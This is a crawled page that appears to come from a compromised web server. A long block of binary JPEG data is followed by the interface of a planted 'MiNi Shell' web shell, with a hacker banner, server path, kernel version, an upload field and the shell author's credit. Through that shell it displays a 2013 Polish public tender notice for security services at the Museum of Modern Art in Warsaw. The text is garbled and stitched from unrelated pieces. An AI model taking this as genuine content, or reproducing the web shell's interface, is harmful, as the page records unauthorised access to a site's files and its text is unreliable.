JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130611/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130611/107521-N-2013.html

<p class="kh_header"><b>Warszawa: REALIZACJA USŁUG OCHRONY NA RZECZ MUZEUM SZTUKI NOWOCZESNEJ W WARSZAWIE Znak postępowania: 16/MSN/PN/2013.</b><br>
<b>Numer ogłoszenia: 107521 - 2013; data zamieszczenia: 11.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum Sztuki Nowoczesnej w Warszawie , ul. Pańska 3, 00-124 Warszawa, woj. mazowieckie, tel. 022 596 40 32, 596 40 00, faks 022 596 40 22.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.artmuseum.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Muzeum/inne instytucje kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> REALIZACJA USŁUG OCHRONY NA RZECZ MUZEUM SZTUKI NOWOCZESNEJ W WARSZAWIE Znak postępowania: 16/MSN/PN/2013..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest świadczenie usług w zakresie całodobowej ochrony obiektu, w ramach której będą realizowane usługi ochrony wg. następującego podziału: a) ochrona standardowa (2013/2014/2015) : 1 os. 24/24 (18000,00 rbh). b) ochrona ponadstandardowa (dodatkowe zlecenia): - 2013 rok: (lipiec-grudzień): 3 os. w godzinach 11.30-20.30. od wtorku do niedzieli za wyjątkiem 01.11.2013 r i 25 i 26.12.2013 r. (6500 rbh) - 2013 rok: dodatkowa ochrona innych wydarzeń realizowanych przez Zamawiającego: 4000,00 rbh. - 2014 rok: dodatkowa ochrona wydarzeń realizowanych przez Zamawiającego: 15000,00 rbh. - 2015 rok: dodatkowa ochrona wydarzeń artystycznych realizowanych przez Zamawiającego: 8000,00 rbh. 2.Opis przedmiotu zamówienia dla punktu (a):Wykonawca zapewnia całodobowa ochronę fizyczna tymczasowej siedziby Muzeum Sztuki Nowoczesnej w Warszawie (Zamawiającego), mieszcząca sie przy ul. Pańskiej 3 w Warszawie (1 os./doba). 2.1. Zamawiający wymaga, aby wykonawca przez cały okres realizacji umowy posiadał ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności o wartości sumy gwarancyjnej co najmniej 1 mln zł. Wysokość sumy gwarancyjnej wynika z wartości obiektów muzealnych, będących przedmiotem ochrony. 2.2. Wykonawca zapewnia umundurowanie pracownikom ochrony zgodne z wytycznymi Zamawiającego (pkt. 5 poniżej). 2.3. Pracownicy ochrony fizycznej umundurowani są następująco: a) marynarka, kolor: granatowy; b) spodnie, kolor: granatowy; c) koszula z kołnierzem; kolor: jasny niebieski; d) krawat, kolor: granatowy; e) buty, kolor czarny; f) dopuszcza sie naszywkę z logo firmy Wykonawcy umieszczona na prawy rękawie marynarki; g) powyżej kieszeni marynarki przeznaczonej na butonierkę (na lewej piersi) Wykonawca umieści naszywkę z napisem - Ochrona Muzeum o wymiarach minimum 2,5 cm (wysokość) i 12 cm (długość). Kolor liter: biały, tło: czarne. h) na lewym rękawie marynarki Wykonawca umieści naszywkę z napisem -Ochrona Muzeum o wymiarach minimum 2,5 cm (wysokość) i 12 cm (długość). Kolor liter: biały, tło: czarne; i) Wykonawca zobowiązuje się do dbałości o schludny wygląd pracowników i natychmiastowej reakcji w przypadku zastrzeżeń ze strony Zamawiającego dotyczących staranności pracowników Wykonawcy, mającej na celu doprowadzenie do właściwego stanu ubioru lub wygładu pracownika ochrony. 2.4. W przypadku, gdy pracownik Wykonawcy z jakiejkolwiek przyczyny nie może pełnić wyznaczonych mu umowa obowiązków/usługi, Wykonawca musi zapewnić zastępstwo w/w pracownika najpóźniej w ciągu godziny, po wcześniejszym ustaleniu tego faktu z Zamawiającym. 2.5. Zamawiający zapewnia pracownikom pomieszczenie socjalne wyposażone w system monitoringu (rejestrator, kamery przemysłowe). 2.6. Pracownicy Wykonawcy wykonują usługę w sposób ustalony z Zamawiającym (dotyczy miejsca przebywania pracowników ochrony, w zależności od potrzeb Zamawiającego. 2.7. Pracownicy ochronny winni być przeszkoleni w zakresie ochrony osób i mienia. 2.8. Zamawiający wymaga aby pracownicy ochrony nie byli karani za przestępstwo umyślne. 2.9. Pracownicy ochrony powinni posiadać umiejętność komunikowania sie w języku angielskim na poziomie A 1. 2.10. Pracownicy ochrony musza być sprawni fizycznie i potrafiący zażegnać wszelkie próby wtargnięcia i zakłócenia spokoju w chronionym obiekcie. 2.11. Wprowadzenie nowego pracownika ochrony następuje wyłącznie po wcześniejszym (z co najmniej 24 godzinnym wyprzedzeniem) zawiadomieniu i uzgodnieniu tego faktu z Zamawiającym lub osoba przez niego upoważniona. 2.12. Podstawowe zadanie i obowiązki wykonawcy usług ochrony: - Zabezpieczenie obiektów przed przedostaniem sie na jego teren osób nieupoważnionych. - Zabezpieczenie majątku i mienia Zamawiającego na terenie posesji oraz wewnątrz obiektów. - Sprawdzanie stanu zabezpieczenia obiektu i pomieszczeń, z uwzględnieniem pomieszczeń wymagających szczególnej ochrony i nadzoru. - Informowanie Zamawiającego o brakach w zabezpieczeniu mienia i naruszeniach przepisów z zakresu zabezpieczenia mienia przez pracowników Zamawiającego w tym niedoboru kluczy. - Zabezpieczenie śladów i dowodów przeciwko mieniu dokonanych na terenie obiektu i posesji oraz niezwłoczne powiadomienie Zamawiającego i w uzgodnieniu ze Zamawiającym organów ścigania oraz udzielenie im wszelkich informacji w tym zakresie. - Wydawanie, przyjmowanie i przechowywanie kluczy do pomieszczeń Zamawiającego. - Obsługa centralki systemu sygnalizacji i monitoringu pożarowego. - Ciągłe, aktywne przebywanie pracowników ochrony w obiekcie podlegającym dozorowi wg harmonogramu służb dozoru. - Dokonanie obchodu wewnątrz i na zewnątrz obiektu (pasaż obok Muzeum) tj. sprawdzanie zabezpieczenia pomieszczeń, porządku, sprawdzanie zamknięcia okien, wygaszanie świateł na korytarzach, klatkach schodowych i ewentualnie pozostawionych w toaletach. - Obchód należy wykonać co najmniej 6 razy na dobę w czasie dyżuru ochrony w uzasadnionych charakterem ochrony odstępach czasowych jeden od drugiego. - Sprawdzanie zamknięć zewnętrznych obiektu i systemu PPoż i alarmowego.. - Natychmiastowe działanie pracowników wykonawcy w razie zauważenia próby kradzieży lub dewastacji mienia znajdującego sie na terenie strzeżonego obiektu oraz w pasażu obok obiektu (natychmiastowe zawiadomienie Policji, Zamawiającego, służb wewnętrznych Wykonawcy, a także w razie potrzeby straży pożarnej i pogotowia ratunkowego), w przypadku zagrożenia osób i mienia. - Ustalenie uprawnień do przebywania osób na terenie dozorowanym. - Wzywanie osób do opuszczenia obiektu, w przypadku stwierdzenia braku uprawnień do przebywania na terenie dozorowanym lub w przypadku stwierdzenia zakłócenia porządku - Sprawdzenie opuszczenia dozorowanego obiektu przez osoby obce. - Sprawdzenie opuszczenia pasażu i placu parkingowego przy obiekcie Zamawiającego przez pojazdy osób obcych - W przypadku wystąpienia awarii sieci energetycznej, centralnego ogrzewania, wodnokanalizacyjnej i telefonicznej - powiadomić niezwłocznie odpowiednie służby ( Pogotowie energetyczne, Pogotowie wodociągowe, Zarządcę Nieruchomości) oraz Zamawiającego i podjąć działania mające na celu zapobieżeniu skutkom awarii - Prowadzenie na bieżąco ewidencji zdarzeń w książce służb. - Prowadzenie ewidencji kluczy wydanych/zdanych. - Szczególny nadzór nad obiektem w godzinach nocnych. - Udzielania informacji na temat godzin otwarcia Muzeum, kierowania petentów do odpowiednich osób. - Stosowanie sie do zarządzeń Zamawiającego i regulaminów obowiązujących u w/w. -Informowanie firmy wskazanej przez Zamawiającego w razie wystąpienia opadów śniegu. 2.14. Godziny pracy Zamawiającego: a) Muzeum (wystawa): wt. - pt.: 12.00 - 20.00.; sb-ndz: 12.00 - 20.00. b) Muzeum (biura): pn.-pt.: 9.00-17.00. c) Kawiarnia, (parter budynku): pn.-pt.: 8.00 - 22.00.; sb.-ndz.: 12.00.-22.00. d) Ksiegarnia Bookoff (parter budynku): pn: 12.00.-16.00.; wt.-ndz.: 12.00.-20.30. 2.15. Obiekty posiadają monitoring (kamery przemysłowe i rejestrator) oraz zabezpieczone kodem wejścia do budynku i przestrzeni biurowej. - w obiekcie przy ul. Pańskiej 3 są dwie kondygnacje, w tym przestrzeń ogólnodostępna na parterze budynku (w tym kawiarnia i księgarnia) oraz przestrzeń biurowa na piętrze budynku. - w obiekcie przy ul. E. Plater 51 są 3 kondygnacje (w tym jedna podziemna), monitoring, system alarmowy i PPoż. 3. Opis przedmiotu zamówienia dla punktu (b): 3.1. Zamawiający poinformuje o planowanym wydarzeniu związanych z dodatkowymi/ponadstandardowymi usługami ochrony z wyprzedzeniem co najmniej 72 godzinnym, z podaniem zakresu godzinowego, miejscowego oraz ilości potrzebnych osób (pracownicy zostaną rozliczeni w sposób analogiczny dla jednego pracownika w zakresie wynagrodzenia stawka za jedną roboczo godzinę razy ilość przepracowanych godzin.) Miejsce wykonywania usług ochrony na rzecz Zamawiającego: tymczasowa siedziba Zamawiającego: ul. Pańska 3, 00-124 Warszawa oraz budynek mieszczący się pod adresem Warszawa, ul. E. Plater 51, a także inne miejsca, w których Zamawiający realizuje wydarzenia artystyczne na terenie m. st. Warszawy (poza siedzibą Zamawiającego w zakresie i terminach uzgodnionych z Zamawiającym - do 20 % zakresu zamówienia). 4. Przez ochronę osób i mienia należy uznać działania w rozumieniu przepisów ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (Dz.U. z 2005 r,Nr 145, poz. 1221 z pózn. zm.) tj. 1) mające na celu zapewnienie bezpieczeństwa życia, zdrowia i nietykalności osób uprawnionych oraz odwiedzających obiekt Muzeum oraz działania zapobiegające przestępstwom i wykroczeniom przeciwko mieniu, a także przeciwdziałające powstaniu szkody wynikającej z tych zdarzeń oraz nie dopuszczające do wstępu osób nieuprawnionych na teren chroniony. 2) Termin realizacji zamówienia: od dnia podpisania umowy do 01.07.2015 r. lub do wyczerpania kwoty która zamawiający przeznaczył na realizacje przedmiotu zamówienia.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>- Zamawiający przewiduje udzielenie Zamówień uzupełniających na podstawie art. 67 ust. 1 pkt. 6 - zamówienie uzupełniające będzie polegało na rozszerzeniu podstawowego przedmiotu zamówienia</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 01.07.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	O zamówienie mogą ubiegać się wykonawcy, którzy posiadają koncesję na prowadzenie działalności gospodarczej w zakresie ochrony osób i mienia, wydaną na podstawie ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (Dz. U. z 2005 r. Nr 145, poz. 1221 ze zm.). Warunek posiadania uprawnień musi spełniać co najmniej jeden z podmiotów występujących wspólnie, z zastrzeżeniem, że uprawnienia musi posiadać każdy z podmiotów występujących wspólnie, który będzie faktycznie świadczył usługi wymagające uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Zamawiający uzna za spełniony warunek posiadania wiedzy i doświadczenia, jeżeli wykonawca wykaże, iż wykonał lub wykonywał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie usługi ochrony o łącznej wartości nie mniejszej niż 200.000,00 zł. oraz załączy dowody, że usługi zostały lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadania opłaconej polisy potwierdzającej, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej z tytułu prowadzenia działalności na kwotę nie niższą niż 200.000 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zamawiający wymaga, aby oferta wykonawcy zawierała: 1) wypełniony Formularz Ofertowy - Załącznik nr 2, 2) W przypadku, gdy ofertę składa pełnomocnik wymagane jest pełnomocnictwo do reprezentowania Wykonawcy. 3) Pisemne zobowiązanie innych podmiotów do oddania Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. ( Jeśli zachodzi sytuacja wynikająca z przepisu 26 ust 2b); 4) Wypełniony załącznik - Wykaz wykonanych usług- Załącznik nr 5.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia: - zmiana zasad i terminów dokonywania odbiorów dostaw, jeśli nie spowoduje zwiększenia kosztów dokonywania odbiorów, które obciążałyby zamawiającego; - zmiana treści dokumentów przedstawianych wzajemnie przez strony w trakcie realizacji umowy lub sposobu informowania o realizacji umowy. Zmiana ta nie może spowodować braku informacji niezbędnych zamawiającemu do prawidłowej realizacji umowy; - zmiana terminów płatności wynikająca z wszelkich zmian wprowadzanych do umowy, a także zmiany samoistne, o ile nie spowodują konieczności zapłaty odsetek lub wynagrodzenia w większej kwocie wykonawcy; - zmiana obowiązującej stawki VAT; Jeśli zmiana stawki VAT będzie powodować zwiększenie kosztów wykonania umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość zwiększenia wynagrodzenia o kwotę równa różnicy w kwocie podatku zapłaconego przez wykonawcę; -Zamawiający zastrzega możliwość redukcji przedmiotu zamówienia o więcej niż 40 % lub możliwość rozwiązania umowy przed czasem bez roszczeń odszkodowawczych ze strony wykonawcy jeśli zmianie ulegnie stan faktyczny związany z umowa najmu użytkowanych przez zamawiającego lokali. -zmiana sposobu rozliczania umowy lub dokonywania płatności na rzecz wykonawcy na skutek zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu lub wytycznych dotyczących realizacji projektu; 2. Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy Prawo Zamówień Publicznych w szczególności: - zmiana danych związanych z obsługa administracyjno-organizacyjna Umowy (np. zmiana nr rachunku bankowego); -zmiana danych teleadresowych, zmiany osób wskazanych do kontaktów miedzy Stronami. 3. Wszelkie zmiany lub uzupełnienia niniejszej umowy wymagają formy pisemnej, pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.artmuseum.pl/zamowieniapubliczne.php<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 00-124 Warszawa, ul. Pańska 3 - recepcja Muzeum Sztuki Nowoczesnej w Warszawie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.06.2013 godzina 15:00, miejsce: 00-124 Warszawa, ul. Pańska 3 - recepcja Muzeum Sztuki Nowoczesnej w Warszawie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com